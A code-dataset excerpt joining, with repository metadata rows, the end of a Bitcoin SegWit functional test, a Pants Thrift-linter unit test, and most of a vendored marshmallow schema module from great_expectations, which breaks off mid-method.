tmpl = self.nodes[0].getblocktemplate({})
assert(tmpl['sigoplimit'] == 20000)
assert(tmpl['transactions'][0]['hash'] == txid)
assert(tmpl['transactions'][0]['sigops'] == 2)
tmpl = self.nodes[0].getblocktemplate({'rules':['segwit']})
assert(tmpl['sigoplimit'] == 20000)
assert(tmpl['transactions'][0]['hash'] == txid)
assert(tmpl['transactions'][0]['sigops'] == 2)
self.nodes[0].generate(1) #block 162
balance_presetup = self.nodes[0].getbalance()
self.pubkey = []
p2sh_ids = [] # p2sh_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE embedded in p2sh
wit_ids = [] # wit_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE via bare witness
for i in range(3):
newaddress = self.nodes[i].getnewaddress()
self.pubkey.append(self.nodes[i].validateaddress(newaddress)["pubkey"])
multiaddress = self.nodes[i].addmultisigaddress(1, [self.pubkey[-1]])
self.nodes[i].addwitnessaddress(newaddress)
self.nodes[i].addwitnessaddress(multiaddress)
p2sh_ids.append([])
wit_ids.append([])
for v in range(2):
p2sh_ids[i].append([])
wit_ids[i].append([])
for i in range(5):
for n in range(3):
for v in range(2):
wit_ids[n][v].append(send_to_witness(v, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[n], False, Decimal("49.999")))
p2sh_ids[n][v].append(send_to_witness(v, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[n], True, Decimal("49.999")))
self.nodes[0].generate(1) #block 163
sync_blocks(self.nodes)
# Make sure all nodes recognize the transactions as theirs
assert_equal(self.nodes[0].getbalance(), balance_presetup - 60*50 + 20*Decimal("49.999") + 50)
assert_equal(self.nodes[1].getbalance(), 20*Decimal("49.999"))
assert_equal(self.nodes[2].getbalance(), 20*Decimal("49.999"))
self.nodes[0].generate(260) #block 423
sync_blocks(self.nodes)
print("Verify default node can't accept any witness format txs before fork")
# unsigned, no scriptsig
self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], False)
self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], False)
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], False)
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], False)
# unsigned with redeem script
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], False, addlength(witness_script(0, self.pubkey[0])))
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], False, addlength(witness_script(1, self.pubkey[0])))
# signed
self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], True)
self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], True)
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], True)
self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], True)
print("Verify witness txs are skipped for mining before the fork")
self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][0], True) #block 424
self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][0], True) #block 425
self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][0], True) #block 426
self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][0], True) #block 427
# TODO: An old node would see these txs without witnesses and be able to mine them
print("Verify unsigned bare witness txs in versionbits-setting blocks are valid before the fork")
self.success_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][1], False) #block 428
self.success_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][1], False) #block 429
print("Verify unsigned p2sh witness txs without a redeem script are invalid")
self.fail_accept(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][1], False)
self.fail_accept(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][1], False)
print("Verify unsigned p2sh witness txs with a redeem script in versionbits-settings blocks are valid before the fork")
self.success_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][1], False, addlength(witness_script(0, self.pubkey[2]))) #block 430
self.success_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][1], False, addlength(witness_script(1, self.pubkey[2]))) #block 431
print("Verify previous witness txs skipped for mining can now be mined")
assert_equal(len(self.nodes[2].getrawmempool()), 4)
block = self.nodes[2].generate(1) #block 432 (first block with new rules; 432 = 144 * 3)
sync_blocks(self.nodes)
assert_equal(len(self.nodes[2].getrawmempool()), 0)
assert_equal(len(self.nodes[2].getblock(block[0])["tx"]), 5)
print("Verify witness txs without witness data are invalid after the fork")
self.fail_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][2], False)
self.fail_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][2], False)
self.fail_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][2], False, addlength(witness_script(0, self.pubkey[2])))
self.fail_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][2], False, addlength(witness_script(1, self.pubkey[2])))
print("Verify default node can now use witness txs")
self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], True) #block 432
self.success_mine(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], True) #block 433
self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], True) #block 434
self.success_mine(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], True) #block 435
print("Verify sigops are counted in GBT with BIP141 rules after the fork")
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1)
tmpl = self.nodes[0].getblocktemplate({'rules':['segwit']})
assert(tmpl['sigoplimit'] == 80000)
assert(tmpl['transactions'][0]['txid'] == txid)
assert(tmpl['transactions'][0]['sigops'] == 8)
print("Verify non-segwit miners get a valid GBT response after the fork")
send_to_witness(1, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[0], False, Decimal("49.998"))
try:
tmpl = self.nodes[0].getblocktemplate({})
assert(len(tmpl['transactions']) == 1) # Doesn't include witness tx
assert(tmpl['sigoplimit'] == 20000)
assert(tmpl['transactions'][0]['hash'] == txid)
assert(tmpl['transactions'][0]['sigops'] == 2)
assert(('!segwit' in tmpl['rules']) or ('segwit' not in tmpl['rules']))
except JSONRPCException:
# This is an acceptable outcome
pass
if __name__ == '__main__':
SegWitTest().main()
| 49.330645 | 198 | 0.654569 |
f7bf2016a22d95a1318cbe4626967e602079f919 | 2,275 | py | Python | contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | null | null | null | contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | null | null | null | contrib/scrooge/tests/python/pants_test/contrib/scrooge/tasks/test_thrift_linter.py | AllClearID/pants | c4fdf00a3bdf9f26f876e85c46909d0729f7132c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from mock import Mock, patch
from pants.backend.codegen.thrift.java.java_thrift_library import JavaThriftLibrary
from pants.base.workunit import WorkUnitLabel
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants_test.task_test_base import TaskTestBase
from pants.contrib.scrooge.tasks.thrift_linter import ThriftLinter
class ThriftLinterTest(TaskTestBase):
def _prepare_mocks(self, task):
self._run_java_mock = Mock(return_value=0)
task.tool_classpath = Mock(return_value='foo_classpath')
task.runjava = self._run_java_mock
@classmethod
def alias_groups(cls):
return BuildFileAliases(
targets={
'java_thrift_library': JavaThriftLibrary,
},
)
@classmethod
def task_type(cls):
return ThriftLinter
@patch('pants.contrib.scrooge.tasks.thrift_linter.calculate_compile_sources')
def test_lint(self, mock_calculate_compile_sources):
def get_default_jvm_options():
return self.task_type().get_jvm_options_default(self.context().options.for_global_scope())
thrift_target = self.create_library('a', 'java_thrift_library', 'a', ['A.thrift'])
task = self.create_task(self.context(target_roots=thrift_target))
self._prepare_mocks(task)
expected_include_paths = {'src/thrift/tweet', 'src/thrift/users'}
expected_paths = {'src/thrift/tweet/a.thrift', 'src/thrift/tweet/b.thrift'}
mock_calculate_compile_sources.return_value = (expected_include_paths, expected_paths)
task._lint(thrift_target, task.tool_classpath('scrooge-linter'))
self._run_java_mock.assert_called_once_with(
classpath='foo_classpath',
main='com.twitter.scrooge.linter.Main',
args=['--ignore-errors', '--include-path', 'src/thrift/users', '--include-path',
'src/thrift/tweet', 'src/thrift/tweet/b.thrift', 'src/thrift/tweet/a.thrift'],
jvm_options=get_default_jvm_options(),
workunit_labels=[WorkUnitLabel.COMPILER, WorkUnitLabel.SUPPRESS_LABEL])
| 40.625 | 96 | 0.755604 |
76cd2c1192f153710c0ad909540da9b7976e8770 | 49,711 | py | Python | great_expectations/marshmallow__shade/schema.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 6,451 | 2017-09-11T16:32:53.000Z | 2022-03-31T23:27:49.000Z | great_expectations/marshmallow__shade/schema.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 3,892 | 2017-09-08T18:57:50.000Z | 2022-03-31T23:15:20.000Z | great_expectations/marshmallow__shade/schema.py | victorcouste/great_expectations | 9ee46d83feb87e13c769e2ae35b899b3f18d73a4 | [
"Apache-2.0"
] | 1,023 | 2017-09-08T15:22:05.000Z | 2022-03-31T21:17:08.000Z | """The :class:`Schema` class, including its metaclass and options (class Meta)."""
import copy
import datetime as dt
import decimal
import inspect
import json
import typing
import uuid
import warnings
from collections import OrderedDict, defaultdict
from collections.abc import Mapping
from functools import lru_cache
from great_expectations.marshmallow__shade import base, class_registry
from great_expectations.marshmallow__shade import fields as ma_fields
from great_expectations.marshmallow__shade import types
from great_expectations.marshmallow__shade.decorators import (
POST_DUMP,
POST_LOAD,
PRE_DUMP,
PRE_LOAD,
VALIDATES,
VALIDATES_SCHEMA,
)
from great_expectations.marshmallow__shade.error_store import ErrorStore
from great_expectations.marshmallow__shade.exceptions import (
StringNotCollectionError,
ValidationError,
)
from great_expectations.marshmallow__shade.orderedset import OrderedSet
from great_expectations.marshmallow__shade.utils import (
EXCLUDE,
INCLUDE,
RAISE,
get_value,
is_collection,
is_instance_or_subclass,
is_iterable_but_not_string,
missing,
set_value,
)
from great_expectations.marshmallow__shade.warnings import RemovedInMarshmallow4Warning
_T = typing.TypeVar("_T")
def _get_fields(attrs, field_class, pop=False, ordered=False):
"""Get fields from a class. If ordered=True, fields will sorted by creation index.
:param attrs: Mapping of class attributes
:param type field_class: Base field class
:param bool pop: Remove matching fields
"""
fields = [
(field_name, field_value)
for field_name, field_value in attrs.items()
if is_instance_or_subclass(field_value, field_class)
]
if pop:
for field_name, _ in fields:
del attrs[field_name]
if ordered:
fields.sort(key=lambda pair: pair[1]._creation_index)
return fields
# This function allows Schemas to inherit from non-Schema classes and ensures
# inheritance according to the MRO
def _get_fields_by_mro(klass, field_class, ordered=False):
"""Collect fields from a class, following its method resolution order. The
class itself is excluded from the search; only its parents are checked. Get
fields from ``_declared_fields`` if available, else use ``__dict__``.
:param type klass: Class whose fields to retrieve
:param type field_class: Base field class
"""
mro = inspect.getmro(klass)
# Loop over mro in reverse to maintain correct order of fields
return sum(
(
_get_fields(
getattr(base, "_declared_fields", base.__dict__),
field_class,
ordered=ordered,
)
for base in mro[:0:-1]
),
[],
)
class SchemaMeta(type):
"""Metaclass for the Schema class. Binds the declared fields to
a ``_declared_fields`` attribute, which is a dictionary mapping attribute
names to field objects. Also sets the ``opts`` class attribute, which is
the Schema class's ``class Meta`` options.
"""
def __new__(mcs, name, bases, attrs):
meta = attrs.get("Meta")
ordered = getattr(meta, "ordered", False)
if not ordered:
# Inherit 'ordered' option
# Warning: We loop through bases instead of MRO because we don't
# yet have access to the class object
# (i.e. can't call super before we have fields)
for base_ in bases:
if hasattr(base_, "Meta") and hasattr(base_.Meta, "ordered"):
ordered = base_.Meta.ordered
break
else:
ordered = False
cls_fields = _get_fields(attrs, base.FieldABC, pop=True, ordered=ordered)
klass = super().__new__(mcs, name, bases, attrs)
inherited_fields = _get_fields_by_mro(klass, base.FieldABC, ordered=ordered)
meta = klass.Meta
# Set klass.opts in __new__ rather than __init__ so that it is accessible in
# get_declared_fields
klass.opts = klass.OPTIONS_CLASS(meta, ordered=ordered)
# Add fields specified in the `include` class Meta option
cls_fields += list(klass.opts.include.items())
dict_cls = OrderedDict if ordered else dict
# Assign _declared_fields on class
klass._declared_fields = mcs.get_declared_fields(
klass=klass,
cls_fields=cls_fields,
inherited_fields=inherited_fields,
dict_cls=dict_cls,
)
return klass
@classmethod
def get_declared_fields(
mcs,
klass: type,
cls_fields: typing.List,
inherited_fields: typing.List,
dict_cls: type,
):
"""Returns a dictionary of field_name => `Field` pairs declared on the class.
This is exposed mainly so that plugins can add additional fields, e.g. fields
computed from class Meta options.
:param klass: The class object.
:param cls_fields: The fields declared on the class, including those added
by the ``include`` class Meta option.
:param inherited_fields: Inherited fields.
:param dict_class: Either `dict` or `OrderedDict`, depending on the whether
the user specified `ordered=True`.
"""
return dict_cls(inherited_fields + cls_fields)
def __init__(cls, name, bases, attrs):
super().__init__(name, bases, attrs)
if name and cls.opts.register:
class_registry.register(name, cls)
cls._hooks = cls.resolve_hooks()
def resolve_hooks(cls) -> typing.Dict[types.Tag, typing.List[str]]:
"""Add in the decorated processors
By doing this after constructing the class, we let standard inheritance
do all the hard work.
"""
mro = inspect.getmro(cls)
hooks = defaultdict(list) # type: typing.Dict[types.Tag, typing.List[str]]
for attr_name in dir(cls):
# Need to look up the actual descriptor, not whatever might be
# bound to the class. This needs to come from the __dict__ of the
# declaring class.
for parent in mro:
try:
attr = parent.__dict__[attr_name]
except KeyError:
continue
else:
break
else:
# In case we didn't find the attribute and didn't break above.
# We should never hit this - it's just here for completeness
# to exclude the possibility of attr being undefined.
continue
try:
hook_config = attr.__marshmallow_hook__
except AttributeError:
pass
else:
for key in hook_config.keys():
# Use name here so we can get the bound method later, in
# case the processor was a descriptor or something.
hooks[key].append(attr_name)
return hooks
class SchemaOpts:
"""class Meta options for the :class:`Schema`. Defines defaults."""
def __init__(self, meta, ordered: bool = False):
self.fields = getattr(meta, "fields", ())
if not isinstance(self.fields, (list, tuple)):
raise ValueError("`fields` option must be a list or tuple.")
self.additional = getattr(meta, "additional", ())
if not isinstance(self.additional, (list, tuple)):
raise ValueError("`additional` option must be a list or tuple.")
if self.fields and self.additional:
raise ValueError(
"Cannot set both `fields` and `additional` options"
" for the same Schema."
)
self.exclude = getattr(meta, "exclude", ())
if not isinstance(self.exclude, (list, tuple)):
raise ValueError("`exclude` must be a list or tuple.")
self.dateformat = getattr(meta, "dateformat", None)
self.datetimeformat = getattr(meta, "datetimeformat", None)
if hasattr(meta, "json_module"):
warnings.warn(
"The json_module class Meta option is deprecated. Use render_module instead.",
RemovedInMarshmallow4Warning,
)
render_module = getattr(meta, "json_module", json)
else:
render_module = json
self.render_module = getattr(meta, "render_module", render_module)
self.ordered = getattr(meta, "ordered", ordered)
self.index_errors = getattr(meta, "index_errors", True)
self.include = getattr(meta, "include", {})
self.load_only = getattr(meta, "load_only", ())
self.dump_only = getattr(meta, "dump_only", ())
self.unknown = getattr(meta, "unknown", RAISE)
self.register = getattr(meta, "register", True)
class Schema(base.SchemaABC, metaclass=SchemaMeta):
"""Base schema class with which to define custom schemas.
Example usage:
.. code-block:: python
import datetime as dt
from dataclasses import dataclass
from great_expectations.marshmallow__shade import Schema, fields
@dataclass
class Album:
title: str
release_date: dt.date
class AlbumSchema(Schema):
title = fields.Str()
release_date = fields.Date()
album = Album("Beggars Banquet", dt.date(1968, 12, 6))
schema = AlbumSchema()
data = schema.dump(album)
data # {'release_date': '1968-12-06', 'title': 'Beggars Banquet'}
:param only: Whitelist of the declared fields to select when
instantiating the Schema. If None, all fields are used. Nested fields
can be represented with dot delimiters.
:param exclude: Blacklist of the declared fields to exclude
when instantiating the Schema. If a field appears in both `only` and
`exclude`, it is not used. Nested fields can be represented with dot
delimiters.
:param many: Should be set to `True` if ``obj`` is a collection
so that the object will be serialized to a list.
:param context: Optional context passed to :class:`fields.Method` and
:class:`fields.Function` fields.
:param load_only: Fields to skip during serialization (write-only fields)
:param dump_only: Fields to skip during deserialization (read-only fields)
:param partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
.. versionchanged:: 3.0.0
`prefix` parameter removed.
.. versionchanged:: 2.0.0
`__validators__`, `__preprocessors__`, and `__data_handlers__` are removed in favor of
`marshmallow.decorators.validates_schema`,
`marshmallow.decorators.pre_load` and `marshmallow.decorators.post_dump`.
`__accessor__` and `__error_handler__` are deprecated. Implement the
`handle_error` and `get_attribute` methods instead.
"""
TYPE_MAPPING = {
str: ma_fields.String,
bytes: ma_fields.String,
dt.datetime: ma_fields.DateTime,
float: ma_fields.Float,
bool: ma_fields.Boolean,
tuple: ma_fields.Raw,
list: ma_fields.Raw,
set: ma_fields.Raw,
int: ma_fields.Integer,
uuid.UUID: ma_fields.UUID,
dt.time: ma_fields.Time,
dt.date: ma_fields.Date,
dt.timedelta: ma_fields.TimeDelta,
decimal.Decimal: ma_fields.Decimal,
} # type: typing.Dict[type, typing.Type[ma_fields.Field]]
#: Overrides for default schema-level error messages
error_messages = {} # type: typing.Dict[str, str]
_default_error_messages = {
"type": "Invalid input type.",
"unknown": "Unknown field.",
} # type: typing.Dict[str, str]
OPTIONS_CLASS = SchemaOpts # type: type
# These get set by SchemaMeta
opts = None # type: SchemaOpts
_declared_fields = {} # type: typing.Dict[str, ma_fields.Field]
_hooks = {} # type: typing.Dict[types.Tag, typing.List[str]]
class Meta:
"""Options object for a Schema.
Example usage: ::
class Meta:
fields = ("id", "email", "date_created")
exclude = ("password", "secret_attribute")
Available options:
- ``fields``: Tuple or list of fields to include in the serialized result.
- ``additional``: Tuple or list of fields to include *in addition* to the
explicitly declared fields. ``additional`` and ``fields`` are
mutually-exclusive options.
- ``include``: Dictionary of additional fields to include in the schema. It is
usually better to define fields as class variables, but you may need to
use this option, e.g., if your fields are Python keywords. May be an
`OrderedDict`.
- ``exclude``: Tuple or list of fields to exclude in the serialized result.
Nested fields can be represented with dot delimiters.
- ``dateformat``: Default format for `Date <fields.Date>` fields.
- ``datetimeformat``: Default format for `DateTime <fields.DateTime>` fields.
- ``render_module``: Module to use for `loads <Schema.loads>` and `dumps <Schema.dumps>`.
Defaults to `json` from the standard library.
- ``ordered``: If `True`, order serialization output according to the
order in which fields were declared. Output of `Schema.dump` will be a
`collections.OrderedDict`.
- ``index_errors``: If `True`, errors dictionaries will include the index
of invalid items in a collection.
- ``load_only``: Tuple or list of fields to exclude from serialized results.
- ``dump_only``: Tuple or list of fields to exclude from deserialization
- ``unknown``: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
- ``register``: Whether to register the `Schema` with marshmallow's internal
class registry. Must be `True` if you intend to refer to this `Schema`
by class name in `Nested` fields. Only set this to `False` when memory
usage is critical. Defaults to `True`.
"""
def __init__(
self,
*,
only: types.StrSequenceOrSet = None,
exclude: types.StrSequenceOrSet = (),
many: bool = False,
context: typing.Dict = None,
load_only: types.StrSequenceOrSet = (),
dump_only: types.StrSequenceOrSet = (),
partial: typing.Union[bool, types.StrSequenceOrSet] = False,
unknown: str = None,
):
# Raise error if only or exclude is passed as string, not list of strings
if only is not None and not is_collection(only):
raise StringNotCollectionError('"only" should be a list of strings')
if not is_collection(exclude):
raise StringNotCollectionError('"exclude" should be a list of strings')
# copy declared fields from metaclass
self.declared_fields = copy.deepcopy(self._declared_fields)
self.many = many
self.only = only
self.exclude = set(self.opts.exclude) | set(exclude)
self.ordered = self.opts.ordered
self.load_only = set(load_only) or set(self.opts.load_only)
self.dump_only = set(dump_only) or set(self.opts.dump_only)
self.partial = partial
self.unknown = unknown or self.opts.unknown
self.context = context or {}
self._normalize_nested_options()
#: Dictionary mapping field_names -> :class:`Field` objects
self.fields = {} # type: typing.Dict[str, ma_fields.Field]
self.load_fields = {} # type: typing.Dict[str, ma_fields.Field]
self.dump_fields = {} # type: typing.Dict[str, ma_fields.Field]
self._init_fields()
messages = {}
messages.update(self._default_error_messages)
for cls in reversed(self.__class__.__mro__):
messages.update(getattr(cls, "error_messages", {}))
messages.update(self.error_messages or {})
self.error_messages = messages
def __repr__(self) -> str:
return "<{ClassName}(many={self.many})>".format(
ClassName=self.__class__.__name__, self=self
)
@property
def dict_class(self) -> type:
return OrderedDict if self.ordered else dict
@property
def set_class(self) -> type:
return OrderedSet if self.ordered else set
@classmethod
def from_dict(
cls,
fields: typing.Dict[str, typing.Union[ma_fields.Field, type]],
*,
name: str = "GeneratedSchema",
) -> type:
"""Generate a `Schema` class given a dictionary of fields.
.. code-block:: python
from great_expectations.marshmallow__shade import Schema, fields
PersonSchema = Schema.from_dict({"name": fields.Str()})
print(PersonSchema().load({"name": "David"})) # => {'name': 'David'}
Generated schemas are not added to the class registry and therefore cannot
be referred to by name in `Nested` fields.
:param dict fields: Dictionary mapping field names to field instances.
:param str name: Optional name for the class, which will appear in
the ``repr`` for the class.
.. versionadded:: 3.0.0
"""
attrs = fields.copy()
attrs["Meta"] = type(
"GeneratedMeta", (getattr(cls, "Meta", object),), {"register": False}
)
schema_cls = type(name, (cls,), attrs)
return schema_cls
##### Override-able methods #####
def handle_error(
self, error: ValidationError, data: typing.Any, *, many: bool, **kwargs
):
"""Custom error handler function for the schema.
:param error: The `ValidationError` raised during (de)serialization.
:param data: The original input data.
:param many: Value of ``many`` on dump or load.
:param partial: Value of ``partial`` on load.
.. versionadded:: 2.0.0
.. versionchanged:: 3.0.0rc9
Receives `many` and `partial` (on deserialization) as keyword arguments.
"""
pass
def get_attribute(self, obj: typing.Any, attr: str, default: typing.Any):
"""Defines how to pull values from an object to serialize.
.. versionadded:: 2.0.0
.. versionchanged:: 3.0.0a1
Changed position of ``obj`` and ``attr``.
"""
return get_value(obj, attr, default)
##### Serialization/Deserialization API #####
@staticmethod
def _call_and_store(getter_func, data, *, field_name, error_store, index=None):
"""Call ``getter_func`` with ``data`` as its argument, and store any `ValidationErrors`.
:param callable getter_func: Function for getting the serialized/deserialized
value from ``data``.
:param data: The data passed to ``getter_func``.
:param str field_name: Field name.
:param int index: Index of the item being validated, if validating a collection,
otherwise `None`.
"""
try:
value = getter_func(data)
except ValidationError as error:
error_store.store_error(error.messages, field_name, index=index)
# When a Nested field fails validation, the marshalled data is stored
# on the ValidationError's valid_data attribute
return error.valid_data or missing
return value
def _serialize(
self, obj: typing.Union[_T, typing.Iterable[_T]], *, many: bool = False
):
"""Serialize ``obj``.
:param obj: The object(s) to serialize.
:param bool many: `True` if ``data`` should be serialized as a collection.
:return: A dictionary of the serialized data
.. versionchanged:: 1.0.0
Renamed from ``marshal``.
"""
if many and obj is not None:
return [
self._serialize(d, many=False)
for d in typing.cast(typing.Iterable[_T], obj)
]
ret = self.dict_class()
for attr_name, field_obj in self.dump_fields.items():
value = field_obj.serialize(attr_name, obj, accessor=self.get_attribute)
if value is missing:
continue
key = field_obj.data_key if field_obj.data_key is not None else attr_name
ret[key] = value
return ret
def dump(self, obj: typing.Any, *, many: bool = None):
"""Serialize an object to native Python data types according to this
Schema's fields.
:param obj: The object to serialize.
:param many: Whether to serialize `obj` as a collection. If `None`, the value
for `self.many` is used.
:return: A dict of serialized data
:rtype: dict
.. versionadded:: 1.0.0
.. versionchanged:: 3.0.0b7
This method returns the serialized data rather than a ``(data, errors)`` duple.
A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised
if ``obj`` is invalid.
.. versionchanged:: 3.0.0rc9
Validation no longer occurs upon serialization.
"""
many = self.many if many is None else bool(many)
if many and is_iterable_but_not_string(obj):
obj = list(obj)
if self._has_processors(PRE_DUMP):
processed_obj = self._invoke_dump_processors(
PRE_DUMP, obj, many=many, original_data=obj
)
else:
processed_obj = obj
result = self._serialize(processed_obj, many=many)
if self._has_processors(POST_DUMP):
result = self._invoke_dump_processors(
POST_DUMP, result, many=many, original_data=obj
)
return result
def dumps(self, obj: typing.Any, *args, many: bool = None, **kwargs):
"""Same as :meth:`dump`, except return a JSON-encoded string.
:param obj: The object to serialize.
:param many: Whether to serialize `obj` as a collection. If `None`, the value
for `self.many` is used.
:return: A ``json`` string
:rtype: str
.. versionadded:: 1.0.0
.. versionchanged:: 3.0.0b7
This method returns the serialized data rather than a ``(data, errors)`` duple.
A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised
if ``obj`` is invalid.
"""
serialized = self.dump(obj, many=many)
def datetime_serializer(o):
if isinstance(o, dt.datetime):
return o.__str__()
if "default" not in kwargs:
kwargs.update({"default": datetime_serializer})
return self.opts.render_module.dumps(serialized, *args, **kwargs)
def _deserialize(
self,
data: typing.Union[
typing.Mapping[str, typing.Any],
typing.Iterable[typing.Mapping[str, typing.Any]],
],
*,
error_store: ErrorStore,
many: bool = False,
partial=False,
unknown=RAISE,
index=None,
) -> typing.Union[_T, typing.List[_T]]:
"""Deserialize ``data``.
:param dict data: The data to deserialize.
:param ErrorStore error_store: Structure to store errors.
:param bool many: `True` if ``data`` should be deserialized as a collection.
:param bool|tuple partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
:param int index: Index of the item being serialized (for storing errors) if
serializing a collection, otherwise `None`.
:return: A dictionary of the deserialized data.
"""
index_errors = self.opts.index_errors
index = index if index_errors else None
if many:
if not is_collection(data):
error_store.store_error([self.error_messages["type"]], index=index)
ret = [] # type: typing.List[_T]
else:
ret = [
typing.cast(
_T,
self._deserialize(
typing.cast(typing.Mapping[str, typing.Any], d),
error_store=error_store,
many=False,
partial=partial,
unknown=unknown,
index=idx,
),
)
for idx, d in enumerate(data)
]
return ret
ret = self.dict_class()
# Check data is a dict
if not isinstance(data, Mapping):
error_store.store_error([self.error_messages["type"]], index=index)
else:
partial_is_collection = is_collection(partial)
for attr_name, field_obj in self.load_fields.items():
field_name = (
field_obj.data_key if field_obj.data_key is not None else attr_name
)
raw_value = data.get(field_name, missing)
if raw_value is missing:
# Ignore missing field if we're allowed to.
if partial is True or (
partial_is_collection and attr_name in partial
):
continue
d_kwargs = {}
# Allow partial loading of nested schemas.
if partial_is_collection:
prefix = field_name + "."
len_prefix = len(prefix)
sub_partial = [
f[len_prefix:] for f in partial if f.startswith(prefix)
]
d_kwargs["partial"] = sub_partial
else:
d_kwargs["partial"] = partial
getter = lambda val: field_obj.deserialize(
val, field_name, data, **d_kwargs
)
value = self._call_and_store(
getter_func=getter,
data=raw_value,
field_name=field_name,
error_store=error_store,
index=index,
)
if value is not missing:
key = field_obj.attribute or attr_name
set_value(typing.cast(typing.Dict, ret), key, value)
if unknown != EXCLUDE:
fields = {
field_obj.data_key if field_obj.data_key is not None else field_name
for field_name, field_obj in self.load_fields.items()
}
for key in set(data) - fields:
value = data[key]
if unknown == INCLUDE:
set_value(typing.cast(typing.Dict, ret), key, value)
elif unknown == RAISE:
error_store.store_error(
[self.error_messages["unknown"]],
key,
(index if index_errors else None),
)
return ret
def load(
self,
data: typing.Union[
typing.Mapping[str, typing.Any],
typing.Iterable[typing.Mapping[str, typing.Any]],
],
*,
many: bool = None,
partial: typing.Union[bool, types.StrSequenceOrSet] = None,
unknown: str = None,
):
"""Deserialize a data structure to an object defined by this Schema's fields.
:param data: The data to deserialize.
:param many: Whether to deserialize `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:return: Deserialized data
.. versionadded:: 1.0.0
.. versionchanged:: 3.0.0b7
This method returns the deserialized data rather than a ``(data, errors)`` duple.
A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised
if invalid data are passed.
"""
return self._do_load(
data, many=many, partial=partial, unknown=unknown, postprocess=True
)
def loads(
self,
json_data: str,
*,
many: bool = None,
partial: typing.Union[bool, types.StrSequenceOrSet] = None,
unknown: str = None,
**kwargs,
):
"""Same as :meth:`load`, except it takes a JSON string as input.
:param json_data: A JSON string of the data to deserialize.
:param many: Whether to deserialize `obj` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to ignore missing fields and not require
any fields declared. Propagates down to ``Nested`` fields as well. If
its value is an iterable, only missing fields listed in that iterable
will be ignored. Use dot delimiters to specify nested fields.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:return: Deserialized data
.. versionadded:: 1.0.0
.. versionchanged:: 3.0.0b7
This method returns the deserialized data rather than a ``(data, errors)`` duple.
A :exc:`ValidationError <marshmallow.exceptions.ValidationError>` is raised
if invalid data are passed.
"""
data = self.opts.render_module.loads(json_data, **kwargs)
